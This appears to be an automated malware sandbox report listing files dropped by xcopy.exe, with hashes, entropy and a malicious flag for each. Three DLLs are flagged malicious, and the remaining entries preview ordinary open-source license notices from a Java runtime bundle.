                                                                                                                                                                                                                                  SHA-512:2EACF056E8CCDBA1521F7890CFCF247AF306FB2BEA6CB782856802629EB95D5AF671956158419281FC0B31CD3B1356CD74D09DFDE9444266DEAC7F300546BD85
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28800
                                                                                                                                                                                                                                  Entropy (8bit):6.652515502461702
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:g23Q1LneyoeJ6YnwtNoZTUH5QkOH0bGGGGNET7T7T7T7lW6/uVL0YYirPxWE1o:g23QBe26YnwtNoZTUH5QkOH0bGGGGNEf
                                                                                                                                                                                                                                  MD5:8C424B5E5C093797E49BA5C9542DC43B
                                                                                                                                                                                                                                  SHA1:044D1626923141E609ADF87995A5AB4545327E9B
                                                                                                                                                                                                                                  SHA-256:B77A8459BA6A93577DD55E2D96965AD2B62D486D3981A633DA2DD711F0F50C84
                                                                                                                                                                                                                                  SHA-512:B2ED8C2779A93E68753DBC836212648976D3309ADD993C1FC115AD8F208AEF683144D8DF68DC76D2DF150E8ADAC6403ED43432596C325D670CF59C0024669432
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):192128
                                                                                                                                                                                                                                  Entropy (8bit):6.5648833435840785
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):81536
                                                                                                                                                                                                                                  Entropy (8bit):6.978212497277623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1165
                                                                                                                                                                                                                                  Entropy (8bit):5.191749491970965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Microsoft DirectShow Samples v156905..### MIT License (MIT).```..Copyright (c) 1992-2004 Microsoft Corporation. All rights reserved...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABIL
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32257
                                                                                                                                                                                                                                  Entropy (8bit):4.787159083415034
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## GNU Glib v2.72.0..### Glib Notice.```..You are receiving a copy of GNU Glib, Version: 2.72.0 in either source or.object code in the JavaFX runtime or JavaFX SDK. The terms of the.Oracle license do NOT apply to the GNU Glib, Version: 2.72.0; it is.licensed under the following license, separately from the Oracle programs.you receive. If you do not wish to install this library, you may delete.this library:.. - On 32-bit Linux systems: delete $(JAVA_HOME)/lib/i386/libglib-lite.so. - On 64-bit Linux systems: delete $(JAVA_HOME)/lib/amd64/libglib-lite.so. - On Mac OS X systems: delete $(JAVA_HOME)/lib/libglib-lite.dylib. - On Windows systems: delete $(JAVA_HOME)\bin\glib-lite.dll..A copy of the Oracle modified GNU Glib library source code is located.in the following OpenJDK git repository:.. https://github.com/openjdk/jfx..You can use git to clone the repository or you can browse the.source using a web browser. The root directory of the GNU Glib source.code is here:.. rt/modul
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35218
                                                                                                                                                                                                                                  Entropy (8bit):4.873624721337186
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## GStreamer v1.20.1..### GStreamer Notice.```..You are receiving a copy of GStreamer, Version: 1.20.1 in either source or.object code in the JavaFX runtime or JavaFX SDK. The terms of the.Oracle license do NOT apply to the GStreamer, Version: 1.20.1; it is.licensed under the following license, separately from the Oracle programs.you receive. If you do not wish to install this library, you may delete.this library:.. - On 32-bit Linux systems: delete $(JAVA_HOME)/lib/i386/libgstreamer-lite.so. - On 64-bit Linux systems: delete $(JAVA_HOME)/lib/amd64/libgstreamer-lite.so. - On Mac OS X systems: delete $(JAVA_HOME)/lib/libgstreamer-lite.dylib. - On Windows systems: delete $(JAVA_HOME)\bin\gstreamer-lite.dll..A copy of the Oracle modified GStreamer library source code is located.in the following OpenJDK git repository:.. https://github.com/openjdk/jfx..You can use git to clone the repository or you can browse the.source using a web browser. The root directory of the GStreamer sou
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24196
                                                                                                                                                                                                                                  Entropy (8bit):5.10190765027611
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## IBM International Components for Unicode (ICU4C) v71.1..### ICU License.```.COPYRIGHT AND PERMISSION NOTICE..Copyright . 1991-2022 Unicode, Inc. All rights reserved..Distributed under the Terms of Use in https://www.unicode.org/copyright.html...Permission is hereby granted, free of charge, to any person obtaining.a copy of the Unicode data files and any associated documentation.(the "Data Files") or Unicode software and any associated documentation.(the "Software") to deal in the Data Files or Software.without restriction, including without limitation the rights to use,.copy, modify, merge, publish, distribute, and/or sell copies of.the Data Files or Software, and to permit persons to whom the Data Files.or Software are furnished to do so, provided that either.(a) this copyright and permission notice appear with all copies.of the Data Files or Software, or.(b) this copyright and permission notice appear in associated.Documentation...THE DATA FILES AND SOFTWARE ARE PROVIDED "AS IS",
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2158
                                                                                                                                                                                                                                  Entropy (8bit):4.774228773676062
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Independent JPEG Group (IJG) JPEG v9e..### IJG License.```../*. * jcapimin.c. *. * Copyright (C) 1994-1998, Thomas G. Lane.. * Modified 2003-2010 by Guido Vollbeding.. * This file is part of the Independent JPEG Group's software.. * For conditions of distribution and use, see the accompanying README file.. */..[From the README file].The authors make NO WARRANTY or representation, either express or implied,.with respect to this software, its quality, accuracy, merchantability, or.fitness for a particular purpose. This software is provided "AS IS", and you,.its user, assume the entire risk as to its quality and accuracy...This software is copyright (C) 1991-2022, Thomas G. Lane, Guido Vollbeding..All Rights Reserved except as specified below...Permission is hereby granted to use, copy, modify, and distribute this.software (or portions thereof) for any purpose, without fee, subject to these.conditions:.(1) If any part of the source code for this software is distributed, then this.READ
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1179
                                                                                                                                                                                                                                  Entropy (8bit):5.180116500742468
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## LibFFI v3.4.2..### LibFFI License.```..libffi - Copyright (c) 1996-2021 Anthony Green, Red Hat, Inc and others..See source files for details...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.``Software''), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES O
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3452
                                                                                                                                                                                                                                  Entropy (8bit):5.242335375516898
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## xmlsoft.org: libxml2 v2.10.4..### libxml2 License.```..Except where otherwise noted in the source code (e.g. the files hash.c,.list.c and the trio files, which are covered by a similar licence but.with different Copyright notices) all the files are:..Copyright (C) 1998-2012 Daniel Veillard. All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WAR
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3031
                                                                                                                                                                                                                                  Entropy (8bit):5.057359446779112
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## xmlsoft.org: libxslt v1.1.35..### libxslt License.```..Licence for libxslt except libexslt.----------------------------------------------------------------------. Copyright (C) 2001-2002 Daniel Veillard. All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is fur-.nished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FIT-.NESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. I
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5732
                                                                                                                                                                                                                                  Entropy (8bit):5.1453426112774965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Mesa 3-D Graphics Library v21.0.3..### Mesa License..```.Copyright (C) 1999-2007 Brian Paul All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17785
                                                                                                                                                                                                                                  Entropy (8bit):4.591906517978096
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Mozilla Public Suffix List..### Public Suffix Notice.```.You are receiving a copy of the Mozilla Public Suffix List in the following.file: <java-home>/lib/security/public_suffix_list.dat. The terms of the.Oracle license do NOT apply to this file; it is licensed under the.Mozilla Public License 2.0, separately from the Oracle programs you receive..If you do not wish to use the Public Suffix List, you may remove the.<java-home>/lib/security/public_suffix_list.dat file...The Source Code of this file is available under the.Mozilla Public License, v. 2.0 and is located at.https://raw.githubusercontent.com/publicsuffix/list/3c213aab32b3c014f171b1673d4ce9b5cd72bf1c/public_suffix_list.dat..If a copy of the MPL was not distributed with this file, you can obtain one.at https://mozilla.org/MPL/2.0/...Software distributed under the License is distributed on an "AS IS" basis,.WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License.for the specific language governing rights and l
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):327799
                                                                                                                                                                                                                                  Entropy (8bit):5.302782566988643
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## WebKit Open Source Project: WebKit v615.1..### WebKit Notice.```..You are receiving a copy of WebKit in either source or.object code in the JavaFX runtime or JavaFX SDK. The terms of the.Oracle license do NOT apply to WebKit; it is.licensed under the following license, separately from the Oracle programs.you receive. If you do not wish to install this library, you may delete.this library:.. - On 32-bit Linux systems: delete $(JAVA_HOME)/lib/i386/libjfxwebkit.so. - On 64-bit Linux systems: delete $(JAVA_HOME)/lib/amd64/libjfxwebkit.so. - On Mac OS X systems: delete $(JAVA_HOME)/lib/libjfxwebkit.dylib. - On Windows systems: delete $(JAVA_HOME)\bin\jfxwebkit.dll..A copy of the Oracle modified WebKit library source code is located.in the following OpenJDK git repository:.. https://github.com/openjdk/jfx..You can use git to clone the repository or you can browse the.source using a web browser. The root directory of the WebKit source.code is here:.. rt/modules/javafx.web/src/m
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1580
                                                                                                                                                                                                                                  Entropy (8bit):5.1976303403500985
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## ASM Bytecode Manipulation Framework v5.0.3 ..### ASM License.```..Copyright (c) 2000-2011 France T.l.com.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:..1. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...3. Neither the name of the copyright holders nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS".AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE.IMPLIED WARRANTIES OF MERCHANT
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                  Entropy (8bit):4.5608226065256705
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Apache Commons Byte Code Engineering Library (BCEL) Version 6.7.0..### Apache Commons BCEL Notice.```.. Apache Commons BCEL. Copyright 2004-2022 The Apache Software Foundation.. This product includes software developed at. The Apache Software Foundation (https://www.apache.org/)...```..### Apache 2.0 License.```.. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/..TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION..1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For t
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3182
                                                                                                                                                                                                                                  Entropy (8bit):5.162739260656451
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Unicode Common Local Data Repository (CLDR) v21.0.1 ..### CLDR License..```..UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE..Unicode Data Files include all data files under the directories.http://www.unicode.org/Public/, http://www.unicode.org/reports/, and.http://www.unicode.org/cldr/data/. Unicode Data Files do not include PDF.online code charts under the directory http://www.unicode.org/Public/..Software includes any source code published in the Unicode Standard or under.the directories http://www.unicode.org/Public/,.http://www.unicode.org/reports/, and http://www.unicode.org/cldr/data/...NOTICE TO USER: Carefully read the following legal agreement. BY DOWNLOADING,.INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S DATA FILES ("DATA.FILES"), AND/OR SOFTWARE ("SOFTWARE"), YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO.BE BOUND BY, ALL OF THE TERMS AND CONDITIONS OF THIS AGREEMENT. IF YOU DO NOT.AGREE, DO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE THE DATA FILES OR.SOFTW
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                                                                  Entropy (8bit):4.610377797901174
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Eastman Kodak Company: Portions of color management and imaging software..### Eastman Kodak Notice.```.Portions Copyright Eastman Kodak Company 1991-2003.```..
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1415
                                                                                                                                                                                                                                  Entropy (8bit):5.179912770731788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Cryptix AES v3.2.0..### Cryptix General License.```..Copyright (c) 1995-2005 The Cryptix Foundation Limited..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.. 1. Redistributions of source code must retain the copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in. the documentation and/or other materials provided with the. distribution...THIS SOFTWARE IS PROVIDED BY THE CRYPTIX FOUNDATION LIMITED AND.CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,.INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED..IN NO EVENT SHALL THE CRYPTIX FOUNDATION LIMITED OR CONTRIBUTORS BE.LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPE
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3756
                                                                                                                                                                                                                                  Entropy (8bit):5.036615782726521
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## DOM Level 3 Core Specification v1.0..### W3C Software Notice.<pre>.Copyright . 2004 World Wide Web Consortium, (Massachusetts Institute of Technology,.European Research Consortium for Informatics and Mathematics, Keio University)..All Rights Reserved...The DOM bindings are published under the W3C Software Copyright Notice and License..The software license requires "Notice of any changes or modifications to the W3C.files, including the date changes were made." Consequently, modified versions of.the DOM bindings must document that they do not conform to the W3C standard; in the.case of the IDL definitions, the pragma prefix can no longer be 'w3c.org'; in the.case of the Java language binding, the package names can no longer be in the.'org.w3c' package..</pre>..### W3C License.```..W3C SOFTWARE NOTICE AND LICENSE..http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231..This work (and included software, documentation such as READMEs, or other.related items) is being provid
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1497
                                                                                                                                                                                                                                  Entropy (8bit):5.192704122810525
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Dynalink v.5..### Dynalink License.```..Copyright (c) 2009-2013, Attila Szegedi..Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.* Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer..* Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution..* Neither the name of the copyright holder nor the names of. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS.IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED.TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A.PARTICULAR PURPOSE ARE DISCLAIMED. IN
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29223
                                                                                                                                                                                                                                  Entropy (8bit):4.641601907789342
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Mozilla Elliptic Curve Cryptography (ECC)..### Mozilla ECC Notice..```.This notice is provided with respect to Elliptic Curve Cryptography,.which is included with JRE, JDK, and OpenJDK...You are receiving a copy.of the Elliptic Curve Cryptography library in source.form with the JDK and OpenJDK source distributions, and as object code in.the JRE & JDK runtimes...In the case of the JRE & JDK runtimes, the terms of the Oracle license do.NOT apply to the Elliptic Curve Cryptography library; it is licensed under the.following license, separately from Oracle's JDK & JRE. If you do not wish to.install the Elliptic Curve Cryptography library, you may delete the.Elliptic Curve Cryptography library:. - On Solaris and Linux systems: delete $(JAVA_HOME)/lib/libsunec.so. - On Windows systems: delete $(JAVA_HOME)\bin\sunec.dll. - On Mac OSX systems: delete. For JRE: /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/lib/libsunec.dylib. For JDK: $(JAVA_HOM
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2957
                                                                                                                                                                                                                                  Entropy (8bit):5.22027056591088
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## freebXML Registry v3.1..### freebXML Notice.```.. *. * This software consists of voluntary contributions made by many. * individuals on behalf of the freebxml Software Foundation. For more. * information on the freebxml Software Foundation, please see. * "http://www.freebxml.org/".. *. * This product includes software developed by the Apache Software. * Foundation (http://www.apache.org/).. *. * $Header: /cvsroot/ebxmlrr/omar/license.txt,v 1.3 2006/04/16 19:10:35 dougb62 Exp $. *..```...### The freebXML License, Version 1.1.```.. ====================================================================. *. * The freebxml License, Version 1.1. *. * Copyright (c) 2001 freebxml.org. All rights. * reserved.. *. * Redistribution and use in source and binary forms, with or without. * modification, are permitted provided that the following conditions. * are met:. *. * 1. Redistributions of source code must retain the above copyright. * notice, this list of conditions and the following dis
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1293
                                                                                                                                                                                                                                  Entropy (8bit):5.2507757788144955
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jXksrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4q/m3oqLF5/zwO8p1:7ksaJHlxE35QHOs5e/m3ogF5/rq1
                                                                                                                                                                                                                                  MD5:492019DF920279BAEAC09AA0C64F8434
                                                                                                                                                                                                                                  SHA1:7890596300F139834F6A32D16210337261FB5498
                                                                                                                                                                                                                                  SHA-256:9139BDC457EEE7432A019A24F18065C7DDF79CC9486E1F9D54C73D1E2CD5B504
                                                                                                                                                                                                                                  SHA-512:AABE3502058AED12C8544E9103594F76161ABB9F81A842742FFB9C80BE7424587D2C64469FE28651EFCEB13AE461B28BE5F46A7A35EB9E060405BD36F1E3BEEC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## GIFLIB v5.2.1..### GIFLIB License.```..The GIFLIB distribution is Copyright (c) 1997 Eric S. Raymond..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2930
                                                                                                                                                                                                                                  Entropy (8bit):5.2474229778556385
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:fmQ5eKjpNhAY4FCNPcwSHW5rSr+lP1JKrzteztw/wHasTI4c/Lr0in/Prfk05:fmQlp/thP97fPQzkzqYHJc/3V/Prf55
                                                                                                                                                                                                                                  MD5:F06C93F6E0508FF7475234CFF59D9F0A
                                                                                                                                                                                                                                  SHA1:BE09FA29C875F3957947A3A93B2D5F4063FCBD82
                                                                                                                                                                                                                                  SHA-256:8EC7DFC03761F581C0DDE060B794BDA2C657A9DB708ABAAF05BE48E1889B4674
                                                                                                                                                                                                                                  SHA-512:DD27147C253252E76012CE4B0C8BD4DBC3DC5E3E31CBC068438BABE22CE7D54725474D30F2B075739F9926EC6477A9CF91962358C50700FA3AA2A703006324E1
                                                                                                                                                                                                                                  Malicious:false
